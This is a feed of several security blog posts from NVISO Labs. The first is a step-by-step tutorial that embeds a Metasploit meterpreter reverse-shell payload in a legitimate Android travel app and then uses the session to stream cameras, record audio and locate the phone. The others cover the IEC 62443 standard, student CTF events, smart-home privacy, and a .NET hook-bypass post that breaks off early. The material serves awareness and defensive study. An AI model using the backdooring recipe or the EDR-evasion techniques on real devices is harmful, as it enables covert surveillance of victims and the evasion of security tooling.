There are new articles available, click to refresh the page.
Before yesterdayNVISO Labs

Backdooring Android Apps for Dummies

31 August 2020 at 07:57

TL;DR – In this post, we’ll explore some mobile malware: how to create them, what they can do, and how to avoid them. Are you interested in learning more about how to protect your phone from shady figures? Then this blog post is for you.


We all know the classic ideas about security on the desktop: install an antivirus, don’t click suspicious links, don’t go to shady websites. Those that take it even further might place a sticker over the webcam of their laptop, because that is the responsible thing to do, right?

But why do most people not apply this logic when it comes to their smartphones? If you think about it, a mobile phone is the ideal target for hackers to gain access to. After all, they often come with not one, but two cameras, a microphone, a GPS antenna, speakers, and they contain a boatload of useful information about us, our friends and the messages we send them. Oh, and of course we take our phone with us, everywhere we go.

In other words, gaining remote access to someone’s mobile device enables an attacker to do all kinds of unsavoury things. In this blog post I’ll explore just how easy it can be to generate a rudimentary Android remote administration trojan (or RAT, for short).

  • Do you simply want to know how to avoid these types of attacks? Then I suggest you skip ahead to the section “How to protect yourself” further down the blog post.
  • Do you want to learn the ins and outs of mobile malware making? Then the following section will guide you through the basics, step by step.

It’s important to know this metasploit RAT is a very well-known malware strain that is immediately detected by practically any AV solution. This tutorial speaks of a rudimentary RAT because it lacks a lot of functionality you would find in actual malware in the wild, such as obfuscation to remain undetected, or persistence to gain access to the device even when the app is closed. Because we are simply researching the possibilities of these types of malware and are not looking to attack a real target, this method will do just fine for this tutorial.

Cooking yourself some mobile malware; a recipe


  • A recent Kali VM with the latest Metasploit Framework installed
  • A spare Android device
  • [Optional] A copy of a legitimate Android app (.apk)


Step 1 – Find out your IP address

To generate the payload, we will need to find out some more information about our own system. The first piece of information we’ll get is our system’s IP address. For the purpose of this blog post we’ll use our local IP address but in the real world you’d likely use your external IP address in order to allow infected devices to connect back to you.

Our IP address can simply be found by opening a terminal window, and typing the following command:

ip a

The address I will use is the one from the eth0 network adapter, more specifically the local IPv4 address as circled in the screenshot.

Step 2 – Generate the payload

This is where the real work happens: we’ll generate our payload using msfvenom, a payload generator included in the Metasploit Framework.

Before you start, make sure you have the following ready:

  1. Your IP address as found in the previous step
  2. Any unused port to run the exploit handler on
  3. (Optional) A legitimate app to hide the backdoor in

We have two options: either we generate the payload standalone, or we hide it as part of an existing legitimate app. While the former is easier, we will go a step further and use an old version of a well-known travel application to disguise our malware.

To do this, open a new terminal window and navigate to the folder containing the legitimate copy of the app you want to backdoor, then run the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>

For this blog post, I used the following values:

  • <your ip address> =
  • <your unused port> = 4444
  • <legitimate app> = tripadvisor.apk
  • <output name> = ta-rat.apk

Step 3 – Test the malware

Having our payload is all fine and dandy, but in order to send commands to it, we need to start a listener on our kali VM on the same port we used to create our malware. To do this, run the following commands:

use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <your ip address>
set lport <your unused port>


Now that we have our listener set up and ready to accept connections, all that remains for us to do is run the malware on our spare Android phone.

For the purposes of this blogpost, I simply transferred the .apk file to the device’s internal storage and ran it. As you can see in the screenshot, the backdoored application requires quite a lot more permissions than the original does.

The original app permissions (left) and the malicious app permissions (right)

All that’s left now is to run the malicious app, and …

We’re in!

Step 4: Playing around with the meterpreter session

Congratulations! If you successfully reached this step, it means you have a working meterpreter session opened on your terminal window and you have pwned the Android phone. So, let’s take a look at what we can do now, shall we?

Activating the cameras

We can get a glimpse into who our victim is by activating either the front or the rear camera of the device. To do this, type the following command in your meterpreter shell:

webcam_stream -i <index>

Where <index> is the index of the camera you want to use. In my experience, the rear camera was index 1, while the selfie camera was at index 2.

Recording the microphone

Curious about what’s being said in the victim’s vicinity? Try recording the microphone by typing:

record_mic -d <duration>

Where <duration> is the duration you want to record in seconds. For example, to record 15 seconds of audio with the device’s built-in microphone, run:

record_mic -d 15


We can also find out our victim’s exact location by typing:


This command will give us the GPS coordinates of the device, which we can simply look up in Google Maps.

Playing an audio file

To finish up, we can play any .wav audio file we have on our system, by typing:

play <filename>.wav

For example:

play astley.wav

Experimenting with other functionality

Of course, these are just a small set of commands the meterpreter session has to offer. For a full list of functionalities, simply type:


Or for more information on a specific command, type:

<command> -h

And play around a bit to see what you can do!


During my initial attempts to get this to work, there were a few difficulties that you might also run into. The most difficult part in the process is finding an app to add the backdoor to. Most recent android apps prevent you from easily decompiling and repackaging them by employing various obfuscation techniques that make it much more difficult to insert the malicious code. For this exercise, I went with an old version of a well known travel app that did not (yet) implement these techniques, as trying to backdoor any of the more recent versions proved unsuccessful.

This is further strengthened by the fact that Android’s permissions API is constantly evolving to prevent this type of abuse by malicious apps. Therefore, it’s not possible to get this exploit to work on the newest Android versions that require explicit user approval before granting the app any dangerous permissions at runtime. That said though, if you are an Android phone user reading this post, be aware that new malware variants constantly see the light of the day, and you should always think twice before granting any application a permission on your phone it does not strictly require. Yes, even if you have the latest safety updates on your device. Even though the methods described in this blog post only work for less recent versions of Android, considering that these versions represent the majority of the Android market share, an enormous number of devices remain vulnerable to this exploit to this day.

There exist some third-party tools and scripts on the internet that promise to achieve more reliable results in backdooring even more recent android apps. However, in my personal experience these tools did not always live up to their expectations. Your mileage may vary in trying these out, but in any case, don’t blindly trust the ReadMe of code you find on the internet: check it yourself and make sure you understand what it does before you run it.

How to protect yourself

Simply put, protecting yourself against these types of attacks starts with realising how these threats make their way onto your system. Your phone already takes a lot of security precautions against malicious applications, so its a good start to always make sure your phone is running the latest update. Additionally, you will need to think twice: once when you choose to install the application, and one more time when you choose to grant the application certain permissions.

First, only install apps from the official app store. Seriously. The app stores for both Android and iOS are strictly curated and scanned for viruses. Is it impossible that a malicious app sneaks by their controls? Not entirely, but it is highly unlikely that it will stay in the store for long until it’s noticed and removed. On iOS, you don’t have much of a choice anyway: if you have not jailbroken your device, you are already restricted to the App Store. For Android, there’s a setting that also allows you to install apps from untrusted sources. If you simply want to enjoy the classic experience your smartphone offers you, you won’t need to touch that setting at all: the google play store likely has everything you’d ever want to do. If you are a more advanced user who wants to be able to fully customise their phone and even root it or add custom ROMs: be my guest, but be extra careful when installing anything on your phone, as you lose a large amount of protections the google play store offers you. Experimenting with your phone is fine, but you need to be very aware of the additional risks you are taking. That goes double if you are downloading unofficial apps from third party sources.

Second, not all apps need all the permissions they ask for. A flashlight application does not need access to your microphone to function properly, so why would you grant it that permission? If you are installing an application and the permission list seems suspiciously long, or certain items definitely are not needed for that app to function, maybe reconsider installing it in the first place, and definitely do NOT give it those permissions. In the best case, they are invading your privacy by tracking you for advertising. In the worst case, a criminal might be trying to exploit the permissions to spy on you.

One last tip I’d like to give is to leave the security settings on your device enabled. It doesn’t matter if you have an iPhone or an Android phone: both iOS and Android have some great security options built in. This also means you won’t need third party antivirus apps on your phone. Often, these apps provide little extra functionality as they are much more restricted in what they can do as compared to what the native security features of your mobile phone OS are already doing.


If there is anything I’d like you to remember from reading this blog post, it’s the following two points:

1. Creating Mobile Malware is Easy. Almost too easy.

This blog post went over the steps to take in order to make a rudimentary Android malware, demonstrating how easy it can be to compromise a smartphone. With a limited set of tools, we can generate and hide a meterpreter reverse shell payload into an existing app, repackage it and install it on an Android device. Anyone with enough motivation to do this can learn it in a limited time frame. There is no need for a large amount of technical knowledge in order to learn this.

2. Smartphones are computers, they need to be protected.

It might not look like one, but a smartphone is a computer just like the one sitting on your desk. These devices are equally vulnerable to malware, and even though the creators of these devices already take a lot of precautions, the user is in the end responsible to keep their device safe. Smartphone users should be aware of the risks their devices face and stay away from unofficial applications outside of the app store, enable the security settings on their devices and be careful to grant excessive permissions to apps, especially from untrusted sources.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their cyber security strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Securing IACS based on ISA/IEC 62443 – Part 1: The Big Picture

4 January 2021 at 16:08

For many years, industrial automation and control systems (IACS) relied on the fact that they were usually isolated in physically secured areas, running on proprietary hardware and software. When open technologies, standard operating systems and protocols started pushing their way into IACS replacing proprietary solutions, the former “security through obscurity” approach did no longer work. Connecting operational technology (OT) networks to information technology (IT) networks had the benefit of making central monitoring and improvement of industrial processes easier – but all these changes also brought new threats and the question of how to properly secure control systems did arise.

This is where ISA/IEC 62443 comes into the picture. The attempt to provide guidance on how to secure IACS against cyber threats reaches back to 2002 when the International Society for Automation (ISA) started creating a series of standards referred to as ISA-99. In 2010, ISA joined forces with the International Electrotechnical Commission (IEC) which lead to the release of the combined standard ISA/IEC 62443 that integrates the former ISA-99 documents.

ISO 27001 vs IEC 62443 – same but different?

But why is there the need for a separate standard at all? Does it not suffice to simply apply security measures that have already been established for IT systems, for example by implementing the requirements of ISO 27001? As a company responsible for designing, implementing, or managing IACS, you might face exactly this question, especially if you want to achieve an official certification.

Despite some similarities, OT systems and IT systems do have fundamental differences. One of the most significant differences is probably that failures in industrial processes usually impact the physical world, i.e. they could harm human health and welfare, endanger the environment by spilling hazardous materials or impact the local economy, for example in case of massive power outages. Also, the focus on core security objectives – such as confidentiality, integrity and availability – is different: While IT prioritizes confidentiality of data, OT focuses on availability of systems; the security objectives of both areas are thus diametrically opposed.

IEC 62443 outlines the unique requirements of IACS while also building on top on already established practices. This means that parts of IEC 62443 were developed with reference to ISO 27001 but also address the differences between IACS and IT systems. Also, the standard does not only outline the implementation of a management system but defines detailed functional and process requirements for both individual IACS components and entire control systems. IEC 62443 thus has a far broader range than ISO 27001 and is more tailored to the specifics of IACS.

IEC 62443 at a glance

The IEC 62443 standard is targeted at three main roles:

  • Product suppliers that develop, distribute and maintain components or systems used in automated solutions.
  • System integrators that design, deploy and commission the automated solution.
  • Asset owners that operate, maintain and decommission the automated solution.

These roles could reside in the same organization or be fulfilled by different organizations. Asset owners might, for example, have an own department responsible for system integration. In another scenario, the asset owner might delegate the task to maintain an automation solution to an external service provider.

The structure of the standard reflects this role definition by grouping related documents accordingly. As a result, IEC 62443 comprises four chapters, each with multiple documents. Some of the documents are currently still in development and have not been released yet. The current status can be tracked at: https://www.isa.org/isa99/

Structure of IEC 62443

The first chapter, General, provides an overview of main concepts and models applied within the standard. At the time of this post, most documents of this chapter are still under development.

The second chapter, Policies and Procedures, covers requirements and measures for establishing a Cyber Security Management System. In the first two parts you will see many references to ISO 27001 and even a mapping of the requirements in both standards. The other parts focus on the processes involved in operating and maintaining IACS and are thus mainly directed at asset owners or – if these tasks are outsourced – at service providers.

The third chapter, System, is mainly directed at system integrators. It provides an overview and assessment of different security measures ranging from authentication techniques and encryption to physical security controls. Furthermore, it guides through the risk assessment process for IACS environments and outlines specific technical requirements for control systems.

The last chapter, Component, focuses on requirements for product suppliers. It covers both procedural aspects such as setting up a secure development lifecycle and technical requirements that a component should meet.

One standard for the entire lifecycle

With regard to IACS, we can distinguish between the lifecycle of a single component that is part of a control system and the lifecycle of the control system itself. Both lifecycles overlap at the point where components get integrated into an automation solution and need to be operated and maintained.

Product suppliers are responsible for all phases within their products’ lifecycle. Part 4-1 provides guidance on how to set up development processes that integrate security-related activities right from the start of product development. Part 4-2 focuses on the product itself and defines specific requirements a product must meet in order to achieve a certain degree of security. Another relevant part especially in the maintenance phase is part 2-3 that outlines a structured process for managing patches.

Applicability of IEC 62443 parts within the product and IACS lifecycle

In the first phase of the IACS lifecycle, the main objective is creating the functional specification. Part 2-1 provides the asset owner with a framework for setting up organizational structures and processes that will ensure that all security dimensions are considered when creating the specification and defining security targets for the IACS.

The commissioning of an IACS usually lies within the responsibility of the system integrator. Based on the previously defined security targets, the system integrator must develop a protection concept in cooperation with the asset owner. Part 3-2 outlines requirements for conducting a risk assessment in order to establish a proper segmentation of the system architecture. Part 3-3 defines which requirements a system must meet in order to achieve a certain level of security. By implementing these requirements, system integrators can prove that their solution meets the security targets defined by the asset owner.

The main responsibility for operating and maintaining the automation solution lies with the asset owner. Part 2-1 provides guidelines how to implement a security management system in order to continuously maintain and improve security. More specific requirements, for example on how to manage accounts or remote access on systems, are outlined in part 2-4; this part should also be considered by system integrators and any service provider supporting the asset owner in the operating phase.

Finally, both parts 2-1 and 2-4 also define requirements for decommissioning single components or the complete automation solution.

Defence in depth

IEC 62443 builds upon the defence in depth principle involving all stakeholders. Defence in depth means that multiple layers of security controls are applied: In case one security control fails, another control ensures that this will still not cause any greater harm.

With regard to IACS, this means that the first layer of defence are measures implemented by the asset owner. This can be for example security policies and procedures or physical controls protecting the perimeter. Further layers of defence are then created in the design of the automation solution by the system integrator, for example by enforcing network segmentation and deploying firewalls. The inner defence layer is realized by the functional security capabilities of components and systems in use. They are developed by the product supplier who is responsible for integrating proper security functions.

Security levels

The number of requirements and security functions to implement depends on the level of security that has been specified by the asset owner. IEC 62443 defines four Security Levels (SL) with increasing protection requirements.

IEC 62443 security levels

The standard further defines three different types of security levels:

  • Target Security Level (SL-T) is the desired level of security that is usually determined by performing a risk assessment.
  • Achieved Security Level (SL-A) is the degree of security achieved with the currently implemented measures. It can be determined through an audit, for example, after the design is available or when the system is in place in order to verify that the implementation meets the previously defined requirements.
  • Capability Security Level (SL-C) is the highest possible security level that a component or system can provide without implementing additional measures.

A simple example illustrates how these three types of security levels play together: We want to protect our orchard against kids stealing apples. This objective is our target security level (SL-T) corresponding to Security Level 2. There are different means available that could help us achieve our goal such as putting up a sign or a fence or buying a watchdog. A sign might not be very effective, i.e. it does not really provide any protection, so its capability security level is 0. Fence or watchdog can ensure better protection, meaning they have higher capability security levels. We now decide which means of protection we set up and then measure how well we are protected, i.e. which security level we have achieved with these measures (SL-A).

Translating this example to the IACS lifecycle, this means that the different types of security levels are applied at different phases of the system lifecycle:

  • The asset owner will first specify the target security level required for a particular automation solution.
  • The system integrator will design the solution to meet those targets. In an iterative process the currently achieved security level (SL-A) is measured and compared to the target security level  (SL-T) – also after the solution is put into operation to ensure that the achieved security level does not decrease over time.
  • As part of the design process the system integrator will select systems and components with the necessary capability security level (SL-C).

Getting certified

After having gained a basic understanding of what IEC 62443 comprises, let us come back to the initial question on how you can achieve an official certification. One misconception is that there is just one IEC 62443 certification as is the case for ISO 27001. Given the broad range of the standard and the multiple stakeholders addressed, the question you should pose is not: Should I get an IEC 62443 certification? but rather Which IEC 62443 certification should I get?

As outlined before, from the stakeholders’ perspective, some parts of the standard are more relevant than others. As a result there are different IEC 62443 certifications focusing on different parts of the standard. For example, most certification programs for product suppliers only consider the requirements outlined in parts 4-1 and 4-2 while certifications for system integrators focus on parts 2-4 and 3-3.

As the market for IEC 62443 certification programs is still less mature when compared with ISO 27001 certifications, the number of organizations offering such a certification is also smaller; some of the most prominent players are TÜV, exida, CertX, UL, DEKRA and ISASecure.


IEC 62443 might be confusing at first glance and the sheer number of documents and requirements may seem intimidating. However, most likely just a small part of the standard will be actually applicable to your organization. The upcoming parts of this blog series on IEC 62443 will outline the specific requirements for each stakeholder in more detail. At the end, you will hopefully have a better understanding on how the standard helps you improve the security of your components or systems and which steps you need to take to get closer to an IEC 62443 certification.

If you need further guidance and support in preparing for an IEC 62443 certification, please contact [email protected].

About the author

Claudia Ully is a penetration tester working in the NVISO Software and Security Assessments team.
Apart from spotting vulnerabilities in applications, she enjoys helping and training developers and IT staff to better understand and prevent security issues.
You can find Claudia on LinkedIn.

Cyber Security Contests – A look behind the scenes about how to expand the community

10 December 2020 at 16:12

Cyber security has long since become a strategic priority for organizations across the globe and in all sectors. Therefore, training and hiring young potential in information security has become a crucial goal.  

To raise awareness of cyber security threats and help train a generation of security aware security experts, we at NVISO organize Capture the Flag (CTF) Cyber Security Events in two countries, Belgium and Germany and reach a broad audience.  

Each year, we organize the Cyber Security Challenge Belgium and the Cyber Security Rumble Germany. After six successful editions in Belgium and two in Germany, we want to share a little information on how the events came to be, and what the main challenges are that we face.

This image has an empty alt attribute; its file name is image-7.png

The organization team of this year’s Challenge

The Capture the Flag events at a glance

Capture the Flag is most known as a game you used to play when you were kids. The field is divided into two camps, and the goal of your team is to steal the opponent’s flag and bring it to your own camp. Although that version of CTF is a lot of fun, the context in Cyber Security is slightly different. In a security CTF, flags can be stored on a vulnerable webserver, compiled into malicious executables, or encrypted using flawed cryptography. Teams then need to solve the various challenges using very broad skills to get the flag and score the points. 

CTFs have been very popular in the information security field for a long time – the DefCon CTF has been organized since 1996! – and are a great way to learn new skillsets, hang out with friends and colleagues and generally have a great time. The rush of finally getting that flag after hours (or days) or work really gets the adrenaline flowing. 😉  

CTFs are very popular as well. If you want, you can play one almost each week(end), often even multiple CTFs are running at the same time! For an overview of all CTFs, you can take a look at ctftime.org

Why do we organize ‘yet another CTF’? 

With a CTF being organized every week, why would we want to add yet another one? Well, the goal of our CTFs is quite different than a typical CTF. Most CTFs act as a competition for experienced security professionals, where incredibly skilled hackers show off their skills and take home the prizes. When we started organizing the first CTF in Belgium in 2015, there was just one goal: Get more students into the information security community. 

It’s no secret that the industry is desperately searching for more motivated people to join us, and positions often stay vacant for a long time. Universities and colleges often offer security courses, but the amount of students that actually end up joining the information security sector is rather low.  

With our CTF, we want to show students that: 

  • Hacking is fun (Who doesn’t like breaking stuff?) 
  • General computer skills and the right attitude can take you very far 
  • Even though it looks like a niche market, the cyber security field is very broad with many different aspects 

As our target audience, we chose all graduating students from local colleges and universities, as they will most likely be choosing a career after graduating and it would be nice if we can push them into our direction 😎

But this ain’t no ordinary CTF 

To reach our goal, we’ve created the Challenge in Belgium. We chose for a jeopardy-style CTF (as opposed to an attack/defense style) to keep the entry level low and give us the possibility to introduce a wide range of challenges to students.  

A participant at the Rumble 2019 life-event

While the core of both the Challenge and the Rumble is a CTF, there’s a little bit more to it to accommodate these sub goals. 

The first one is probably the easiest. Each year, we contact everyone we know in the Belgian/German infosec field and ask if they want to create a challenge. By outsourcing challenge creation, we can both shine a spotlight on talented individuals, as make sure that there is a very wide range of challenges to solve. 

Testing social skills is quite difficult for a CTF, as contestants typically sit behind their laptop screen for the entirety of the competition, and don’t really have to interact with other contestants or the organizers. To add this aspect to our event, we came up with the concept of challenges created by our sponsors. For these challenges, the qualifying teams have to face a panel of experts where they have to solve problems interactively. We’ve had live forensics investigations, incident response roll-playing, debates on the pros/cons of a cashless society, and calling up people to social engineer them into giving you valuable information.  

These challenges also automatically allow students and future employers to interact, which is a double win. 

Expanding to Germany 

After 6 years, the Cyber Security Challenge in Belgium is reaching over 700 students from more than 30 schools and the Challenge is even used as a preselection for the Belgian team for the European Cyber Security Challenge, organized by ENISA. Due to this success  and the interest of the industry, NVISO launched a sister event in Germany in 2019, called the Cyber Security Rumble. With the focus on mainly German academic students, the event was set up in cooperation with RedRocket (a famous German CTF team), the University of Bonn-Rhein-Sieg, SANS, and the German Federal Office for Information Security. The collaboration between these parties already shows that the goal remains to have the CTF driven by the community, and not by a single company.  

Even though the Challenge in Belgium had been organized successfully for quite a few years, it was still a gamble to see if Germany was as receptive to the students-only concept. Luckily, the first year managed to reach 300 participants in the qualifier rounds, from which 13 teams made it into the finals.  

The Challenge and Rumble in 2020 

The organization of the latest edition of the Cyber Security Challenge & Rumble was, as with all other events in 2020, defined by the COVID pandemic. While we love the interaction we have with the students during each edition, it was clear that we had to move to an online-only event to make sure everyone can stay safe. 

For the Challenge in Belgium, we decided to open the finals CTF to all the students that would have qualified for our computer-less CTF, and once again the top 12 teams would continue on day 2 with interactive challenges, this time in an online format. The online format took a lot more work on the day itself, as we needed to make sure everyone was joining (and leaving 😉) the correct meeting rooms. Discord allowed us to interact directly with students in case there were issues or questions, and also helped to still have a relaxed atmosphere in the general channels. The second day ended with an online prize ceremony, where all top 12 teams received their prizes, such as a trip to DefCon Las Vegas, a SANS course and much more.  

The German Rumble, in turn, was a full two-day online event organized on Halloween and welcomed more than 470 active teams, both German academic teams as well as international teams. By also communicating with the participants via a Discord chat, the players could get in contact with the sponsors that created the challenges and to interact with other participants about the challenges. Moreover, a scoreboard showed the progress and listing of the teams so that the speed and team spirit was cheered up a little more. Also the Rumble was rounded off with a prize ceremony, in which a representative of SANS announced the prizes.  

Tweet from the Rumble during it’s online prize ceremony

The challenges we still face each year 

There are various challenges and questions that pop up each year. While we don’t have a solid answer on all of them, we still want to share them, and any input in the comments is of course appreciated! 

Reaching students 

Although both the Challenge and the Rumble have grown in popularity, it’s a very large effort each time to reach all the students. We have to actively communicate with professors, schools and student unions to make sure students participate, often even visiting schools and presenting our challenge in security-focussed courses.  

Keeping the competition fair for everyone 

With such awesome prizes on the line, there’s always the possibility of teams collaborating, sharing solutions or flags. This is something that’s hard to prevent, although we do have various technical checks in place to detect weird behaviour. Additionally, we try to rely on the schools to do the right thing. Some schools even organize a small on-campus event during the qualifiers so that teams can be in the same room. However, through our good connections with the relevant professors, we can be sure that students are behaving and that we don’t have to fear dishonest collaboration. 

A participant in this year’s online Challenge 

Keeping it students only 

Another issue that regularly pops up is how we define a student. For example: Can PhD students participate? Technically they are students, with a valid student card. In practice, they would have a huge advantage over other students. Similarly, what if someone who has been in the industry for many years decides to join an online course at a registered university/college? Can they join? The hardest part here is being consistent while also being fair to everyone involved… 

NVISO as the common organizer

With our efforts to organize these great initiatives and thus to enhance the Cyber Security Communities in both countries, we are constantly supporting cross border activities. Both can learn from each other, are in constant communication and help to drive individual events to their success. We’re happy that both events can reach a substantial number of students and that we create interactivity between Belgium and Germany.  

Come join us! 

If you’re a cyber security specialist in Belgium or Germany, we’d love your help in creating challenges. It’s a great way to show your skills and connect with other challenge creators, sponsors and of course the awesome organizing team.  

And of course, if you’re still a Belgian/German student, don’t hesitate and sign up for either the Challenge or Rumble and take home some of the awesome prizes. 😊 

If you are not convinced yet, check out our after movies and catch a glimpse of the sphere of the last years: 

After movie Cyber Security Challenge Belgium

After movie Cyber Security Rumble Germany

Stay tuned for the events in 2021 and for exciting and fun challenges to crack!   

About the authors

This article was jointly written by:

  • Annika ten Velden, Operations Manager
  • Marina Hirschberger, Senior Consultant
  • Jeroen Beckers, Mobile security expert

They are all working at NVISO and are actively contributing to the organization of the events. While Annika and Jeroen are taking care of the Challenge in Belgium, Marina is part of the organization team of the Rumble in Germany. 

Smart Home Devices: assets or liabilities? – Part 2: Privacy

30 November 2020 at 09:52

TL;DR – Part two of this trilogy of blog posts will tackle the next big topic when it comes to smart home devices: privacy. Are these devices doubling as the ultimate data collection tool, and are we unwittingly providing the manufacturers with all of our private data? Find out in this blog post!

This blog post is part of a series – you can read part 1 here, and keep an eye out for the next part too!

Security: ✓ – Privacy: ?

In my previous blog post, I gave some insights into the security level provided by a few Smart Home environments that are currently sold on the European market. In conclusion, I found that the security of these devices is often a hit or miss and the lack of transparency around security means it can be quite difficult for the consumer to choose the good devices as opposed to some of the bad apples. There is one major topic missing from it though: even if a device is secure, how well does it protect the user’s privacy?

Privacy concerns

It turns out that this question is not unjustified: just like the security concerns surrounding smart home devices, privacy concerns are at least equally present, or maybe even more so. The fear that our own house is spying on us, is something that should be prevented by transparency and strong data subject rights.

These data subject access rights might have already been there on paper for a long time, but it’s never been easy to enforce them in practice. I strongly recommend looking at this paper by Jef Ausloos and Pierre Dewitte that shows just how difficult it used to be to get a data controller to comply with existing regulation.

Does this mean that there is no hope? Well, not exactly. Since then, the GDPR has come into effect. Even though it might still be too early to get concrete results, there have been some developments moving into the right direction. Just a few months ago, in July 2020, the EU-US privacy shield was deemed invalid after a ruling by the Court of Justice of the EU in a case brought up by Max Schrems’ NGO ‘noyb’ (‘none of your business’). This decision means that data transfers from the EU to the US are subject to the same requirements as transfers to any other country outside of the EU.

Existing regulation in Europe

So, which laws are there that protect our privacy anyways? To start with the basics, the European Convention of Human Rights and the Charter of Fundamental Rights of the European Union lay the groundwork for every individual’s right to privacy in their Article 8 and Article 7 respectively. These articles state that: “Everyone has the right to respect for his private and family life, his home and his correspondence.”.

On top of these, there used to be Directive 95/46/EC, which outlined the requirements each EU member state had to implement into their national privacy regulation. However, each member state could implement these requirements at their own discretion, which led to a lot of diverging laws between EU member states. The directive was eventually revoked for GDPR to take its place.

The General Data Protection Regulation (GDPR) is the current regulation that harmonises the privacy regulation for all EU member states. Its well-known new provisions enable data subjects to more effectively enforce their rights and protects the privacy of all people within the EU; or at least it does so on paper.

From paper to practice

Aside from testing the security of each device, I decided to also include some privacy tests in the scope of my assessments. For more information on the choice of devices, make sure to check out my previous blog post!

For each device, I added privacy-related tests in two major fields:

  • privacy policies: I verified if, for each device, the privacy policy contained all the relevant information it should have according to GDPR;
  • data subject access rights: I contacted each vendor’s privacy department with a generic data subject access request, asking them to give me a copy of the personal data they held about me.

Privacy policies: all or nothing

The first step in checking the completeness of a privacy policy, is finding out where it is stored – if it even exists. In many cases, finding a privacy policy was easy, but finding the right one was a different story. Many vendors had multiple versions of the policy, sometimes different editions for the USA and the EU, and other times they simply excluded everything from their scope except the website – not very useful for this research.

The privacy policies showed the exact same phenomenon as I already saw in the security part of the research: if they were compliant on one part, usually they put in a good attempt to be compliant across the board. The opposite was also true: if a policy was incomplete, it often didn’t contain any of the required info as per the GDPR. The specific elements that need to be included in a privacy policy under GDPR are outlined in Article 13. The table below shows which of the policies adhered to which provisions in this article.

The results of checking each privacy policy
(Image credit: see “Reference” below)

Access requests: hide & seek

In the exact same way that it can be difficult to locate a privacy policy, it can sometimes be a real hassle to find the correct contact details to submit a data access request. Most vendors with a compliant privacy policy had either an email address of the DPO, or a link to an online form listed as a means of contact. In case I could not locate the correct contact details, I would attempt to reach them a single time by mailing to their general information address or contacting their customer support. I would also send out a single reminder to each vendor if they had not replied after one month.

What it feels like trying to reach the DPO of many manufacturers
(Image credit: imgflip.com)

Surprisingly, many vendors straight up ignored the request: one third (!) of requests went unanswered. Those that did reply, usually responded quite quickly after receiving the initial request. With a few exceptions that requested deadline extensions or simply claimed to “have never received the initial email” after being sent a reminder.

One third of the sent requests went unanswered
(Image credit: see “Reference” below)

Most importantly, the number of satisfactory replies after running this experiment for over 5 months was disappointingly low. Often, either the answers to the questions in the request or the returned data itself were strongly lacking. In some cases, no satisfying answer was given at all. In one or two notable instances, however, the follow up of the privacy department was excellent and an active effort was made to comply with the request as well as possible.

The aftermath

From these results, it’s clear that there are some changes to be seen in the privacy landscape. Here and there, companies are putting in an effort to be GDPR compliant, with varying effectiveness. However, just like with security, there is a major gap in maturity between the different vendors: the divide between those that attempt to be compliant and those that are non-compliant is massive. Most notably, the companies that ignored access requests or had outdated privacy policies were those that might deem themselves too small to be “noticed” by authorities or are simply located too far from the EU to care about it. This suggests there is a need for more active enforcement, also on companies incorporated outside of the EU, and more transparency surrounding fines and penalties imposed on those that are non-compliant.

Even though privacy compliance is going in the right direction, there is still a lot of progress to be made in order to get an acceptable baseline of compliance across the industry. Active enforcement and increased transparency surrounding fines and penalties is needed to motivate organisations to invest in their privacy and data protection maturity.

Stay tuned for Part 3 of this series, in which I’ll be discussing some options for dealing with the issues I found during this research.

This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.


[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Dynamic Invocation in .NET to bypass hooks

20 November 2020 at 08:45

TLDR: This blogpost showcases several methods of dynamic invocation that can be leveraged to bypass inline and IAT hooks. A proof of concept can be found here: https://github.com/NVISO-BE/DInvisibleRegistry

A while ago, a noticeable shift in red team tradecraft happened. More and more tooling is getting created in C# or ported from PowerShell to C#.
PowerShell became better shielded against offensive tradecraft thanks to a variety of changes, ranging from AMSI (Anti Malware Scan Interface) to Script Block logging and more.
One of the cool features of C# is the ability to call the Win32 API and manipulate low-level functions like you normally would in C or C++
The process of leveraging these API functions in C# is dubbed Platform Invoking (P/invoke for short). Microsoft made this possible thanks to the System.Runtime.InteropServices namespace in C#. All of which is being “managed” by the CLR (Common Language Runtime). The graphic below shows how using P/Invoke, you can bridge the gap between unmanaged and managed code.

Consuming Unmanaged DLL Functions | Microsoft Docs
How P/invoke bridges the cap between managed and unmanaged code.
source – https://docs.microsoft.com/en-us/dotnet/framework/interop/consuming-unmanaged-dll-functions

There is an operational (from an offensive point of view) drawback to leveraging .NET as well, however. Since the CLR is responsible for the translation between .NET to machine-readable code, the executable is not directly translated into this code. This means that the executable stores its entire codebase in the assembly, and is thus very easily reverse-engineered.

On top of assemblies being reversed engineered, we are also moving more and more into an EDR (Endpoint Detection and Response) world. Organizations are (thankfully) increasing their (cyber)security posture around the globe, making the lives of operators harder, which is a good thing. As Cybersecurity consultants it is our job to help organizations increase their cybersecurity posture so we are glad that this is moving in the right direction.

EDR’s catch offensive tradecraft, even when executed in memory (without touching disk, also commonly referred to as “fileless”) by hooking into processes and subverting their execution on certain functions. This allows the EDR to inspect what is happening, and if it likes what it sees, the EDR will let the function call pass and normal execution of the program will be achieved. @CCob posted a very nice blog post series about this concept, and how to bypass the hooks. A good EDR will “hook” in the lowest level possible,this would be ntdll.dll (this dll is responsible of making system calls to the Windows kernel). The image below is a good example of how EDR’s could work.

EDR Observations | RE & Sec Blog
how EDR’s can hook ntdll calls to prevent malware execution
source – http://christopher-vella.com/2020/08/21/EDR-Observations.html

There are two main methods an EDR uses to do its hooking, ironically, this is also how most rootkits operate: IAT hooking and Inline hooking (also known as splicing).

